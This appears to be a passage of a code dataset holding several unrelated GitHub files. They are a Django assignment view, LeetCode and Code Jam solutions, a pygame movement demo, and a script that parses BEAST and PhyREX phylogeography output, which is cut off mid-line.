if request.user.is_instructor:\n messages.info(request, \"This is for students only\")\n return HttpResponseRedirect(\"/explore\")\n if not group_instance:\n messages.info(request, \"No Such Class\")\n return HttpResponseRedirect(\"/explore\")\n relationship_instance = Relationship.objects.filter(group_id=group_pk, student_instance=request.user).first()\n if not relationship_instance:\n messages.info(request, \"You are not in that Group\")\n return HttpResponseRedirect(\"/explore\")\n\n class_instance = group_instance.class_instance\n # find all assignment for this class\n assignment_in_class = Assignment.objects.filter(class_instance=class_instance)\n assignment_group_dict = {}\n for a in assignment_in_class:\n a_rel = AssignmentRelationship.objects.filter(group_instance=group_instance,\n assignment_instance=a).first()\n if not a_rel:\n # this group has no file for this assignment\n assignment_group_dict[a] = False\n else:\n assignment_group_dict[a] = a_rel\n\n return render(request, 'assignment_in_group.html', {\n 'group_ins': group_instance,\n 'assignment_rel_dic': assignment_group_dict,\n 'time_now': timezone.now()\n })\n\n","repo_name":"beyoglubora/Squad","sub_path":"assignments/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":7904,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"61"} +{"seq_id":"32940945347","text":"__author__ = \"Shihao Yu\"\n\"\"\"\nsource: https://leetcode.com/problems/single-number/\ndate: 2016-02-09\n----------------\nproblem:\nGiven an array of integers, every element appears twice except for one. Find that single one.\n\nNote:\nYour algorithm should have a linear runtime complexity. Could you implement it without using extra memory?\n----------------\n\nXOR:\nsince a ^ (b ^ c) = (a ^ b) ^ c,\nand a ^ b = b ^ a\nand b ^ b = 0 (a ^ b ^ b = a)\n\n\"\"\"\n\n\nclass Solution(object):\n def singleNumber(self, nums):\n \"\"\"\n :type nums: List[int]\n :rtype: int\n \"\"\"\n x = 0\n for num in nums:\n x = x ^ num\n return x\n","repo_name":"yshwaker/leetcode-solution","sub_path":"136-SingleNumber*.py","file_name":"136-SingleNumber*.py","file_ext":"py","file_size_in_byte":660,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"} +{"seq_id":"23440201661","text":"#!/usr/bin/env python\nimport sys\nimport math\n\nargv = sys.argv\nargc = len(argv)\n\ninp = argv[1]\n\ndef process_string(s):\n tokens = []\n\n sub = \"\"\n last_char = s[0]\n\n for c in s:\n if c == last_char:\n sub += c\n else:\n last_char = c\n tokens.append(sub)\n sub = str(c)\n tokens.append(sub)\n\n return tokens\n\ndef do_problem(stringA, stringB):\n if stringA == stringB:\n return 0\n\n pA = process_string(stringA)\n pB = process_string(stringB)\n\n if len(pA) != len(pB):\n return \"Fegla Won\"\n for i in range(len(pA)):\n if pA[i][0] != pB[i][0]:\n return \"Fegla Won\"\n\n actions = 0\n for i in range(len(pA)):\n actions += abs(len(pA[i]) - len(pB[i]))\n\n return actions\n\nwith open(inp) as f:\n T = int(f.readline())\n\n for i in range(T):\n N = int(f.readline())\n\n strings = [f.readline().strip() for _ in range(N)]\n answer = do_problem(strings[0], strings[1])\n\n print(\"Case #{}: \".format(i+1) + str(answer))\n","repo_name":"dr-dos-ok/Code_Jam_Webscraper","sub_path":"solutions_python/Problem_142/571.py","file_name":"571.py","file_ext":"py","file_size_in_byte":1049,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"69803928836","text":"import pygame\r\nimport sys\r\nfrom pygame.locals import *\r\n\r\n\r\nWIDTH, HEIGHT = 1000, 800\r\nFPS = 300\r\n\r\n\r\ndef main():\r\n pygame.init()\r\n display = pygame.display.set_mode((WIDTH, HEIGHT))\r\n clock = pygame.time.Clock()\r\n\r\n player_moving_x = 0\r\n player_moving_y = 0\r\n player_speed = 5\r\n player_surf = pygame.surface.Surface((10, 10))\r\n player_surf.fill('blue')\r\n player_rect = player_surf.get_rect()\r\n player_rect.topleft = (0, 0)\r\n\r\n while True: # main loop\r\n display.fill((255, 255, 255))\r\n\r\n player_rect.x += player_moving_x\r\n player_rect.y += player_moving_y\r\n display.blit(player_surf, player_rect)\r\n\r\n for event in pygame.event.get():\r\n if event.type == QUIT:\r\n terminate()\r\n elif event.type == KEYUP:\r\n if event.key in (K_w, K_s):\r\n player_moving_y = 0\r\n elif event.key in (K_a, K_d):\r\n player_moving_x = 0\r\n elif event.type == KEYDOWN:\r\n if event.key == K_w:\r\n player_moving_y = -player_speed\r\n elif event.key == K_s:\r\n player_moving_y = player_speed\r\n elif event.key == K_a:\r\n player_moving_x = -player_speed\r\n elif event.key == K_d:\r\n player_moving_x = player_speed\r\n pygame.display.flip()\r\n clock.tick(FPS)\r\n\r\n\r\ndef terminate():\r\n pygame.quit()\r\n sys.exit()\r\n\r\n\r\nif __name__ == '__main__':\r\n main()\r\n","repo_name":"Cynthia7979/PigeonCoding","sub_path":"Classes/[13]/wasd_demo.py","file_name":"wasd_demo.py","file_ext":"py","file_size_in_byte":1548,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"29027455278","text":"moves = \"UDLRUDLR\"\n\ndef judgeCircle(moves: str) -> bool:\n\tx, y = 0, 0\n\n\tfor move in moves:\n\t\tif (move == \"U\"):\n\t\t\ty += 1\n\t\telif (move == \"D\"):\n\t\t\ty -= 1\n\t\telif (move == \"R\"):\n\t\t\tx += 1\n\t\telif (move == \"L\"):\n\t\t\tx -= 1\n\treturn (x == 0) and (y == 0)\n\nprint(f\"The Robot {'returned' if judgeCircle(moves) else 'did not return'} to the origin\")","repo_name":"Rohit5551998/LeetCode-in-Python","sub_path":"Math/Robot Return To Origin.py","file_name":"Robot Return To Origin.py","file_ext":"py","file_size_in_byte":338,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"20364840336","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Oct 4 2019\n\n@author: Nicola De Maio\n\"\"\"\n\nimport argparse\n#import dendropy\nimport os\nimport numpy as np\n\nN=100\n\nphyrexRootLocationIndex=21 #position of root location in phyrex output file - before was 19 and before even less\nthinPhyrex=20 #subsample from phyrex output to reduce file sizes\n\n#Check the new version of the phyrex output and create files accordingly\n\nextraAnalyses=True\nrootFiles=False\nsigmaFiles=False\nBEAST=False\nChangePhyrex=False\n\nif extraAnalyses:\n\trounds=5\n\tfor r in range(1,rounds+1):\n\t\tanalyses=[\"One sided sampling BMP, beast, round \"+str(r),\"One sided sampling BMP with extra samples, beast, round \"+str(r)]\n\t\tfoldersBEAST=[\"output/beast/sampled_gradient\"+str(r)+\"/\",\"output/c_beast/sampled_gradient\"+str(r)+\"/\"]\n\t\tfoldersRoots=[\"output/beast/sampled_gradient\"+str(r)+\"/\",\"output/c_beast/sampled_gradient\"+str(r)+\"/\"]\n\t\ttoSkip=[0,0]\n\t\ttruth=[1.0,0.0,1.0]\n\t\tfor i in range(len(analyses)):\n\t\t#for i in range(1):\n\t\t\tprint(\"\\n\")\n\t\t\tprint(analyses[i])\n\t\t\tfileX=open(\"plots/\"+analyses[i].replace(\" \",\"_\")+\"_rootX_new2.txt\",\"w\")\n\t\t\tfileY=open(\"plots/\"+analyses[i].replace(\" \",\"_\")+\"_rootY_new2.txt\",\"w\")\n\t\t\t\n\t\t\tfor j in range(N):\n\t\t\t\t#if i==1:\n\t\t\t\tprint(j)\n\t\t\t\trootsX=[]\n\t\t\t\trootsY=[]\n\t\t\t\tfile=open(foldersRoots[i]+\"root_data/actual_root\"+str(j+toSkip[i])+\".txt\")\n\t\t\t\tline=file.readline()\n\t\t\t\txLoc=float(line.replace(\"\\n\",\"\"))\n\t\t\t\tline=file.readline()\n\t\t\t\tyLoc=float(line.replace(\"\\n\",\"\"))\n\t\t\t\tfile.close()\n\t\t\t\ttrueRoots=[xLoc,yLoc]\n\t\t\n\t\t\t\testimatedXRoots=[]\n\t\t\t\testimatedYRoots=[]\n\t\t\t\t#if (i<8 or i>15) and BEAST:\n\t\t\t\tfile=open(foldersBEAST[i]+\"root_data/observed_roots\"+str(j)+\".txt\")\n\t\t\t\t#print(foldersBEAST[i]+\"root_data/observed_roots\"+str(j)+\".txt\")\n\t\t\t\tline=file.readline()\n\t\t\t\twhile line!=\"\" and line!=\"\\n\":\n\t\t\t\t\tlinelist=line.split()\n\t\t\t\t\testimatedXRoot=float(linelist[0])-trueRoots[0]\n\t\t\t\t\testimatedYRoot=float(linelist[1])-trueRoots[1]\n\t\t\t\t\testimatedXRoots.append(estimatedXRoot)\n\t\t\t\t\testimatedYRoots.append(estimatedYRoot)\n\t\t\t\t\trootsX.append(estimatedXRoot)\n\t\t\t\t\trootsY.append(estimatedYRoot)\n\t\t\t\t\tfileX.write(str(estimatedXRoot))\n\t\t\t\t\tfileY.write(str(estimatedYRoot))\n\t\t\t\t\tfileX.write(\"\\t\")\n\t\t\t\t\tfileY.write(\"\\t\")\n\t\t\t\t\tline=file.readline()\n\t\t\t\tfileX.write(\"\\n\")\n\t\t\t\tfileY.write(\"\\n\")\n\t\t\t\tfile.close()\n\t\t\t\t#if i==1:\n\t\t\t\tprint(np.mean(rootsX))\n\t\t\t\tprint(np.std(rootsX))\n\t\t\t\tprint(np.mean(rootsY))\n\t\t\t\tprint(np.std(rootsY))\n\t\t\t\tprint(\"\")\n\t\t\tfileX.close()\n\t\t\tfileY.close()\n\t\t\t\n\t\t\tfileX=open(\"plots/\"+analyses[i].replace(\" \",\"_\")+\"_sigmaX.txt\",\"w\")\n\t\t\tfileCorr=open(\"plots/\"+analyses[i].replace(\" \",\"_\")+\"_Corr.txt\",\"w\")\n\t\t\tfileY=open(\"plots/\"+analyses[i].replace(\" \",\"_\")+\"_sigmaY.txt\",\"w\")\n\t\t\tfor j in range(N):\n\t\t\t\tprint(j)\n\t\t\n\t\t\t\testimatedSigmaX=[]\n\t\t\t\testimatedSigmaY=[]\n\t\t\t\testimatedCov=[]\n\t\t\t\testimatedSigma=[]\n\t\t\t\testimatedCorr=[]\n\t\t\t\ttreeLs=[]\n\t\t\t\tXoverYs=[]\n\t\t\t\tfile=open(foldersBEAST[i]+\"beast_output/beast\"+str(j)+\".log.txt\")\n\t\t\t\tfor k in range(4):\n\t\t\t\t\tline=file.readline()\n\t\t\t\tlinelist=line.split()\n\t\t\t\ttreeLi=linelist.index(\"treeLength\")\n\t\t\t\tcorri=linelist.index(\"correlation\")\n\t\t\t\txi=linelist.index(\"location.varCovar.location.precision.col11\")\n\t\t\t\tyi=linelist.index(\"location.varCovar.location.precision.col22\")\n\t\t\t\tline=file.readline()\n\t\t\t\twhile line!=\"\" and line!=\"\\n\":\n\t\t\t\t\tlinelist=line.split()\n\t\t\t\t\testimatedX=float(linelist[xi])/float(linelist[treeLi])\n\t\t\t\t\testimatedY=float(linelist[yi])/float(linelist[treeLi])\n\t\t\t\t\testimatedC2=float(linelist[corri])\n\t\t\t\t\ttreeL=float(linelist[treeLi])\n\t\t\t\t\testimatedSigmaX.append(estimatedX)\n\t\t\t\t\testimatedSigmaY.append(estimatedY)\n\t\t\t\t\testimatedCorr.append(estimatedC2)\n\t\t\t\t\ttreeLs.append(treeL)\n\t\t\t\t\tfileX.write(str(estimatedX))\n\t\t\t\t\tfileY.write(str(estimatedY))\n\t\t\t\t\tfileCorr.write(str(estimatedC2))\n\t\t\t\t\tfileX.write(\"\\t\")\n\t\t\t\t\tfileY.write(\"\\t\")\n\t\t\t\t\tfileCorr.write(\"\\t\")\n\t\t\t\t\tline=file.readline()\n\t\t\t\tfileX.write(\"\\n\")\n\t\t\t\tfileY.write(\"\\n\")\n\t\t\t\tfileCorr.write(\"\\n\")\n\t\t\t\tfile.close()\n\t\t\tfileX.close()\n\t\t\tfileY.close()\n\t\t\tfileCorr.close()\n\t\n\nanalyses=[\"No Bias BMP, beast\",\"Central Sampling BMP, beast\", \"Diagonal Sampling BMP, beast\", \"One sided sampling BMP, beast\", \"No Bias BMP, beast with extra samples\",\"Central Sampling BMP, beast with extra samples\", \"Diagonal Sampling BMP, beast with extra samples\", \"One sided sampling BMP, beast with extra samples\", \"Broad sampling LFV, beast\", \"Narrow sampling LFV, beast\", \"No Bias BMP, phyrex\",\"Central Sampling BMP, phyrex\", \"Diagonal Sampling BMP, phyrex\", \"One sided sampling BMP, phyrex\", \"Broad sampling LFV, phyrex\", \"Narrow sampling LFV, phyrex\", \"No Bias BMP, beast without extra samples\",\"Central Sampling BMP, beast without extra samples\", \"Diagonal Sampling BMP, beast without extra samples\", \"One sided sampling BMP, beast without extra samples\"]\nfoldersBEAST=[\"output/beast/sampled1/\",\"output/beast/sampled2/\",\"output/beast/sampled3/\",\"output/beast/sampled4/\",\"output/c_beast/sampled1/\",\"output/c_beast/sampled2/\",\"output/c_beast/sampled3/\",\"output/c_beast/sampled4/\", \"output/beast/LV/\",\"output/beast/LV/\",\"output/phyrex/sampled1/\",\"output/phyrex/sampled2/\",\"output/phyrex/sampled3/\",\"output/phyrex/sampled4/\", \"output/phyrex/LV/\",\"output/phyrex/LV/\",\"output/unc_beast/sampled1/\",\"output/unc_beast/sampled2/\",\"output/unc_beast/sampled3/\",\"output/unc_beast/sampled4/\"]\nfoldersRoots=[\"output/beast/sampled1/\",\"output/beast/sampled2/\",\"output/beast/sampled3/\",\"output/beast/sampled4/\",\"output/c_beast/sampled1/\",\"output/c_beast/sampled2/\",\"output/c_beast/sampled3/\",\"output/c_beast/sampled4/\",\"output/LV/\",\"output/LV/\",\"output/beast/sampled1/\",\"output/beast/sampled2/\",\"output/beast/sampled3/\",\"output/beast/sampled4/\",\"output/LV/\",\"output/LV/\",\"output/c_beast/sampled1/\",\"output/c_beast/sampled2/\",\"output/c_beast/sampled3/\",\"output/c_beast/sampled4/\"]\ntoSkip=[0,0,0,0,0,0,0,0,0,100,0,0,0,0,0,100,0,0,0,0]\n\nif rootFiles:\n\tfor i in range(len(analyses)):\n\t\tprint(\"\\n\")\n\t\tprint(analyses[i])\n\t\tif BEAST or (i>9 and i<=15):\n\t\t\tfileX=open(\"plots/\"+analyses[i].replace(\" \",\"_\")+\"_rootX_new2.txt\",\"w\")\n\t\t\tfileY=open(\"plots/\"+analyses[i].replace(\" \",\"_\")+\"_rootY_new2.txt\",\"w\")\n\t\tprint(\"plots/\"+analyses[i].replace(\" \",\"_\")+\"_rootX.txt\")\n\t\tif i>9 and i<=15:\n\t\t\tfileX2=open(\"plots/\"+analyses[i].replace(\" \",\"_\")+\"_rootX_new3.txt\",\"w\")\n\t\t\tfileY2=open(\"plots/\"+analyses[i].replace(\" \",\"_\")+\"_rootY_new3.txt\",\"w\")\n\t\tfor j in range(N):\n\t\t\t#print(j)\n\t\t\tfile=open(foldersRoots[i]+\"root_data/actual_root\"+str(j+toSkip[i])+\".txt\")\n\t\t\tline=file.readline()\n\t\t\txLoc=float(line.replace(\"\\n\",\"\"))\n\t\t\tline=file.readline()\n\t\t\tyLoc=float(line.replace(\"\\n\",\"\"))\n\t\t\tfile.close()\n\t\t\ttrueRoots=[xLoc,yLoc]\n\t\t\n\t\t\testimatedXRoots=[]\n\t\t\testimatedYRoots=[]\n\t\t\tif (i<8 or i>15) and BEAST:\n\t\t\t\tfile=open(foldersBEAST[i]+\"root_data/observed_roots\"+str(j)+\".txt\")\n\t\t\t\t#print(foldersBEAST[i]+\"root_data/observed_roots\"+str(j)+\".txt\")\n\t\t\t\tline=file.readline()\n\t\t\t\twhile line!=\"\" and line!=\"\\n\":\n\t\t\t\t\tlinelist=line.split()\n\t\t\t\t\testimatedXRoot=float(linelist[0])-trueRoots[0]\n\t\t\t\t\testimatedYRoot=float(linelist[1])-trueRoots[1]\n\t\t\t\t\testimatedXRoots.append(estimatedXRoot)\n\t\t\t\t\testimatedYRoots.append(estimatedYRoot)\n\t\t\t\t\tfileX.write(str(estimatedXRoot))\n\t\t\t\t\tfileY.write(str(estimatedYRoot))\n\t\t\t\t\tfileX.write(\"\\t\")\n\t\t\t\t\tfileY.write(\"\\t\")\n\t\t\t\t\tline=file.readline()\n\t\t\t\tfileX.write(\"\\n\")\n\t\t\t\tfileY.write(\"\\n\")\n\t\t\t\tfile.close()\n\t\t\telif (i==8 or i==9) and BEAST:\n\t\t\t\tfile=open(foldersBEAST[i]+\"beast_output/beast\"+str(j+toSkip[i])+\".trees.txt\")\n\t\t\t\t#print(foldersBEAST[i]+\"beast_output/beast\"+str(j+toSkip[i])+\".trees.txt\")\n\t\t\t\tline=file.readline()\n\t\t\t\tlinelist=line.split()\n\t\t\t\twhile len(linelist)<2 or linelist[0]!=\"tree\":\n\t\t\t\t\tline=file.readline()\n\t\t\t\t\tlinelist=line.split()\n\t\t\t\t\tif line==\"\":\n\t\t\t\t\t\tbreak\n\t\t\t\twhile line!=\"\" and line!=\"\\n\" and len(linelist)>1:\n\t\t\t\t\t#print(line)\n\t\t\t\t\tlocs=linelist[-1].split(\"{\")[-1].replace(\"}];\",\"\")\n\t\t\t\t\testimatedXRoot=float(locs.split(\",\")[0])-trueRoots[0]\n\t\t\t\t\testimatedYRoot=float(locs.split(\",\")[1])-trueRoots[1]\n\t\t\t\t\testimatedXRoots.append(estimatedXRoot)\n\t\t\t\t\testimatedYRoots.append(estimatedYRoot)\n\t\t\t\t\tfileX.write(str(estimatedXRoot))\n\t\t\t\t\tfileY.write(str(estimatedYRoot))\n\t\t\t\t\tfileX.write(\"\\t\")\n\t\t\t\t\tfileY.write(\"\\t\")\n\t\t\t\t\tline=file.readline()\n\t\t\t\t\tlinelist=line.split()\n\t\t\t\tfileX.write(\"\\n\")\n\t\t\t\tfileY.write(\"\\n\")\n\t\t\t\tfile.close()\n\t\t\tif i>9 and i<=15:\n\t\t\t\t\tfile=open(foldersBEAST[i]+\"phyrex_output/out_new2_phyrex_stats_\"+str(j+toSkip[i])+\"_ESS.txt\")\n\t\t\t\t\tline=file.readline()\n\t\t\t\t\tESS=int(line.replace(\"\\n\",\"\"))\n\t\t\t\t\tfile.close()\n\t\t\t\t\tfile=open(foldersBEAST[i]+\"phyrex_output/out_new2_phyrex_stats_\"+str(j+toSkip[i])+\".txt\")\n\t\t\t\t\t#print(foldersBEAST[i]+\"phyrex_output/out_phyrex_stats_\"+str(j+toSkip[i])+\".txt\")\n\t\t\t\t\tline=file.readline()\n\t\t\t\t\tlinelist=line.split()\n\t\t\t\t\twhile len(linelist)<2 or linelist[0]!=\"sample\":\n\t\t\t\t\t\tline=file.readline()\n\t\t\t\t\t\tlinelist=line.split()\n\t\t\t\t\t\tif line==\"\":\n\t\t\t\t\t\t\tbreak\n\t\t\t\t\tline=file.readline()\n\t\t\t\t\tlinelist=line.split()\n\t\t\t\t\tcount=0\n\t\t\t\t\twhile line!=\"\" and line!=\"\\n\":\n\t\t\t\t\t\tcount+=1\n\t\t\t\t\t\tif count%thinPhyrex==0:\n\t\t\t\t\t\t\testimatedXRoot=float(linelist[phyrexRootLocationIndex].replace(\"f\",\"\"))-trueRoots[0]\n\t\t\t\t\t\t\testimatedYRoot=float(linelist[phyrexRootLocationIndex+1])-trueRoots[1]\n\t\t\t\t\t\t\testimatedXRoots.append(estimatedXRoot)\n\t\t\t\t\t\t\testimatedYRoots.append(estimatedYRoot)\n\t\t\t\t\t\t\tfileX.write(str(estimatedXRoot))\n\t\t\t\t\t\t\tfileY.write(str(estimatedYRoot))\n\t\t\t\t\t\t\tfileX.write(\"\\t\")\n\t\t\t\t\t\t\tfileY.write(\"\\t\")\n\t\t\t\t\t\t\tif ESS==1:\n\t\t\t\t\t\t\t\tfileX2.write(str(estimatedXRoot))\n\t\t\t\t\t\t\t\tfileY2.write(str(estimatedYRoot))\n\t\t\t\t\t\t\t\tfileX2.write(\"\\t\")\n\t\t\t\t\t\t\t\tfileY2.write(\"\\t\")\n\t\t\t\t\t\tline=file.readline()\n\t\t\t\t\t\tlinelist=line.split()\n\t\t\t\t\tif ESS==1:\n\t\t\t\t\t\tfileX2.write(\"\\n\")\n\t\t\t\t\t\tfileY2.write(\"\\n\")\n\t\t\t\t\tfileX.write(\"\\n\")\n\t\t\t\t\tfileY.write(\"\\n\")\n\t\t\t\t\tfile.close()\n\n\n\n\n\t\t\t#print(len(estimatedXRoots))\n\t\t\t#if len(estimatedXRoots)>100:\n\t\t\t#\tprint(str(numpy.percentile(estimatedXRoots, 2.5))+\" \"+str(numpy.percentile(estimatedXRoots, 50))+\" \"+str(numpy.percentile(estimatedXRoots, 97.5)))\n\t\t\t#\tprint(str(numpy.percentile(estimatedYRoots, 2.5))+\" \"+str(numpy.percentile(estimatedYRoots, 50))+\" \"+str(numpy.percentile(estimatedYRoots, 97.5)))\n\t\t\t#else:\n\t\t\t#\tprint(\"Less than 100 samples!\")\n\t\tif BEAST or (i>9 and i<=15):\n\t\t\tfileX.close()\n\t\t\tfileY.close()\n\t\tif i>9 and i<=15:\n\t\t\tfileX2.close()\n\t\t\tfileY2.close()\n\n\n\nif sigmaFiles:\n\tif BEAST:\n\t\tanalyses=[\"No Bias BMP, beast\",\"Central Sampling BMP, beast\", \"Diagonal Sampling BMP, beast\", \"One sided sampling BMP, beast\", \"No Bias BMP, beast with extra samples\",\"Central Sampling BMP, beast with extra samples\", \"Diagonal Sampling BMP, beast with extra samples\", \"One sided sampling BMP, beast with extra samples\", \"No Bias BMP, beast without extra samples\",\"Central Sampling BMP, beast without extra samples\", \"Diagonal Sampling BMP, beast without extra samples\", \"One sided sampling BMP, beast without extra samples\", \"Broad sampling LFV, beast\", \"Narrow sampling LFV, beast\"]\n\t\tfoldersBEAST=[\"output/beast/sampled1/\",\"output/beast/sampled2/\",\"output/beast/sampled3/\",\"output/beast/sampled4/\",\"output/c_beast/sampled1/\",\"output/c_beast/sampled2/\",\"output/c_beast/sampled3/\",\"output/c_beast/sampled4/\",\"output/unc_beast/sampled1/\",\"output/unc_beast/sampled2/\",\"output/unc_beast/sampled3/\",\"output/unc_beast/sampled4/\", \"output/beast/LV/\",\"output/beast/LV/\"]\n\t\t#foldersRoots=[\"output/beast/sampled1/\",\"output/beast/sampled2/\",\"output/beast/sampled3/\",\"output/beast/sampled4/\",\"output/c_beast/sampled1/\",\"output/c_beast/sampled2/\",\"output/c_beast/sampled3/\",\"output/c_beast/sampled4/\",\"output/LV/\",\"output/LV/\"]\n\t\ttruth=[1.0,0.0,1.0]\n\t\ttoSkip=[0,0,0,0,0,0,0,0,0,0,0,0,0,100]\n\t\tfor i in range(len(analyses)):\n\t\t\tprint(\"\\n\")\n\t\t\tprint(analyses[i])\n\t\t\tfileX=open(\"plots/\"+analyses[i].replace(\" \",\"_\")+\"_sigmaX.txt\",\"w\")\n\t\t\tfileCorr=open(\"plots/\"+analyses[i].replace(\" \",\"_\")+\"_Corr.txt\",\"w\")\n\t\t\tfileY=open(\"plots/\"+analyses[i].replace(\" \",\"_\")+\"_sigmaY.txt\",\"w\")\n\t\t\t#fileSigma=open(\"plots/\"+analyses[i].replace(\" \",\"_\")+\"_Sigma.txt\",\"w\")\n\t\t\t#fileXoverY=open(\"plots/\"+analyses[i].replace(\" \",\"_\")+\"_XoverY.txt\",\"w\")\n\t\t\tfor j in range(N):\n\t\t\t\t#print(j)\n\t\t\n\t\t\t\testimatedSigmaX=[]\n\t\t\t\testimatedSigmaY=[]\n\t\t\t\testimatedCov=[]\n\t\t\t\testimatedSigma=[]\n\t\t\t\testimatedCorr=[]\n\t\t\t\ttreeLs=[]\n\t\t\t\tXoverYs=[]\n\t\t\t\tif i<12:\n\t\t\t\t\tfile=open(foldersBEAST[i]+\"beast_output/beast\"+str(j)+\".log.txt\")\n\t\t\t\telif i==12 or i==13:\n\t\t\t\t\tfile=open(foldersBEAST[i]+\"beast_output/beast\"+str(j+toSkip[i])+\".log.txt\")\n\t\t\t\tfor k in range(4):\n\t\t\t\t\tline=file.readline()\n\t\t\t\tlinelist=line.split()\n\t\t\t\ttreeLi=linelist.index(\"treeLength\")\n\t\t\t\tcorri=linelist.index(\"correlation\")\n\t\t\t\txi=linelist.index(\"location.varCovar.location.precision.col11\")\n\t\t\t\tyi=linelist.index(\"location.varCovar.location.precision.col22\")\n\t\t\t\t#covi=linelist.index(\"location.varCovar.location.precision.col12\")\n\t\t\t\t#diffi=linelist.index(\"location.diffusionRate\")\n\t\t\t\tline=file.readline()\n\t\t\t\twhile line!=\"\" and line!=\"\\n\":\n\t\t\t\t\tlinelist=line.split()\n\t\t\t\t\testimatedX=float(linelist[xi])/float(linelist[treeLi])\n\t\t\t\t\testimatedY=float(linelist[yi])/float(linelist[treeLi])\n\t\t\t\t\t#estimatedC=float(linelist[covi])/float(linelist[treeLi])\n\t\t\t\t\testimatedC2=float(linelist[corri])\n\t\t\t\t\t#estimatedD=float(linelist[diffi])\n\t\t\t\t\ttreeL=float(linelist[treeLi])\n\t\t\t\t\testimatedSigmaX.append(estimatedX)\n\t\t\t\t\testimatedSigmaY.append(estimatedY)\n\t\t\t\t\t#estimatedCov.append(estimatedC)\n\t\t\t\t\testimatedCorr.append(estimatedC2)\n\t\t\t\t\t#estimatedSigma.append(estimatedD)\n\t\t\t\t\ttreeLs.append(treeL)\n\t\t\t\t\tfileX.write(str(estimatedX))\n\t\t\t\t\tfileY.write(str(estimatedY))\n\t\t\t\t\tfileCorr.write(str(estimatedC2))\n\t\t\t\t\t#fileSigma.write(str(estimatedD))\n\t\t\t\t\t#fileXoverY.write(str(estimatedX/estimatedY))\n\t\t\t\t\t#XoverYs.append(estimatedX/estimatedY)\n\t\t\t\t\tfileX.write(\"\\t\")\n\t\t\t\t\tfileY.write(\"\\t\")\n\t\t\t\t\tfileCorr.write(\"\\t\")\n\t\t\t\t\t#fileSigma.write(\"\\t\")\n\t\t\t\t\t#fileXoverY.write(\"\\t\")\n\t\t\t\t\tline=file.readline()\n\t\t\t\tfileX.write(\"\\n\")\n\t\t\t\tfileY.write(\"\\n\")\n\t\t\t\tfileCorr.write(\"\\n\")\n\t\t\t\t#fileSigma.write(\"\\n\")\n\t\t\t\t#fileXoverY.write(\"\\n\")\n\t\t\t\tfile.close()\n\n\t\t\t\t#print(len(estimatedSigmaX))\n\t\t\t\t#if len(estimatedSigmaX)>100:\n\t\t\t\t#\tprint(str(numpy.percentile(estimatedSigmaX, 2.5))+\" \"+str(numpy.percentile(estimatedSigmaX, 50))+\" \"+str(numpy.percentile(estimatedSigmaX, 97.5)))\n\t\t\t\t#\tprint(str(numpy.percentile(estimatedSigmaY, 2.5))+\" \"+str(numpy.percentile(estimatedSigmaY, 50))+\" \"+str(numpy.percentile(estimatedSigmaY, 97.5)))\n\t\t\t\t\t#print(str(numpy.percentile(estimatedCov, 2.5))+\" \"+str(numpy.percentile(estimatedCov, 50))+\" \"+str(numpy.percentile(estimatedCov, 97.5)))\n\t\t\t\t#\tprint(str(numpy.percentile(estimatedCorr, 2.5))+\" \"+str(numpy.percentile(estimatedCorr, 50))+\" \"+str(numpy.percentile(estimatedCorr, 97.5)))\n\t\t\t\t\t#print(str(numpy.percentile(estimatedSigma, 2.5))+\" \"+str(numpy.percentile(estimatedSigma, 50))+\" \"+str(numpy.percentile(estimatedSigma, 97.5)))\n\t\t\t\t\t#print(str(numpy.percentile(XoverYs, 2.5))+\" \"+str(numpy.percentile(XoverYs, 50))+\" \"+str(numpy.percentile(XoverYs, 97.5)))\n\t\t\t\t\t#print(str(numpy.percentile(treeLs, 2.5))+\" \"+str(numpy.percentile(treeLs, 50))+\" \"+str(numpy.percentile(treeLs, 97.5)))\n\t\t\t\t#else:\n\t\t\t\t#\tprint(\"Less than 100 samples!\")\n\t\t\tfileX.close()\n\t\t\tfileY.close()\n\t\t\tfileCorr.close()\n\t\t\t#fileSigma.close()\n\t\t\t#fileXoverY.close()\n\t\t\n\t\t\n\t\n\t#Phyrex\n\tanalyses=[\"No Bias BMP, phyrex\", \"Central Sampling BMP, phyrex\", \"Diagonal Sampling BMP, phyrex\", \"One sided sampling BMP, phyrex\", \"Broad sampling LFV, phyrex\", \"Narrow sampling LFV, phyrex\"]\n\tfoldersBEAST=[\"output/phyrex/sampled1/\",\"output/phyrex/sampled2/\",\"output/phyrex/sampled3/\",\"output/phyrex/sampled4/\", \"output/phyrex/LV/\",\"output/phyrex/LV/\"]\n\t#foldersRoots=[\"output/beast/sampled1/\",\"output/beast/sampled2/\",\"output/beast/sampled3/\",\"output/beast/sampled4/\",\"output/c_beast/sampled1/\",\"output/c_beast/sampled2/\",\"output/c_beast/sampled3/\",\"output/c_beast/sampled4/\",\"output/LV/\",\"output/LV/\",\"output/beast/sampled1/\",\"output/beast/sampled2/\",\"output/beast/sampled3/\",\"output/beast/sampled4/\",\"output/LV/\",\"output/LV/\"]\n\ttoSkip=[0,0,0,0,0,100]\n\tfor i in range(len(analyses)):\n\t\tprint(\"\\n\")\n\t\tprint(analyses[i])\n\t\tfileSigma=open(\"plots/\"+analyses[i].replace(\" \",\"_\")+\"_SigmaFormula_new2.txt\",\"w\")\n\t\tfileSigma2=open(\"plots/\"+analyses[i].replace(\" \",\"_\")+\"_SigmaObservedRoot_new2.txt\",\"w\")\n\t\tfileSigma3=open(\"plots/\"+analyses[i].replace(\" \",\"_\")+\"_SigmaObservedTips_new2.txt\",\"w\")\n\t\tfileSigma4=open(\"plots/\"+analyses[i].replace(\" \",\"_\")+\"_SigmaObservedTips1_new2.txt\",\"w\")\n\t\tfileSigman=open(\"plots/\"+analyses[i].replace(\" \",\"_\")+\"_SigmaFormula_new3.txt\",\"w\")\n\t\tfileSigma2n=open(\"plots/\"+analyses[i].replace(\" \",\"_\")+\"_SigmaObservedRoot_new3.txt\",\"w\")\n\t\tfileSigma3n=open(\"plots/\"+analyses[i].replace(\" \",\"_\")+\"_SigmaObservedTips_new3.txt\",\"w\")\n\t\tfileSigma4n=open(\"plots/\"+analyses[i].replace(\" 